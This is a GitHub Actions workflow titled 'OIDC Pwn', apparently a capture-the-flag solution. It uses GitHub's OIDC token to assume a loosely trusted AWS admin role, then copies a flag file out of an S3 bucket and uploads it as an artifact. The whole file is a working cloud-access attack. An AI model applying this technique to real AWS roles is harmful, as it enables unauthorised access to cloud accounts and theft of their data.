name: OIDC Pwn
on: { workflow_dispatch: {} }
permissions:
  id-token: write
  contents: read
jobs:
  grab:
    runs-on: ubuntu-latest
    steps:
      - name: Configure AWS Credentials via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875
          aws-region: ap-southeast-1
      - name: Who am I
        run: aws sts get-caller-identity
      - name: Grab flag
        run: aws s3 cp s3://oh-i-really-do-care/flag.txt - | tee flag.txt
      - uses: actions/upload-artifact@v4
        with:
          name: flag
          path: flag.txt
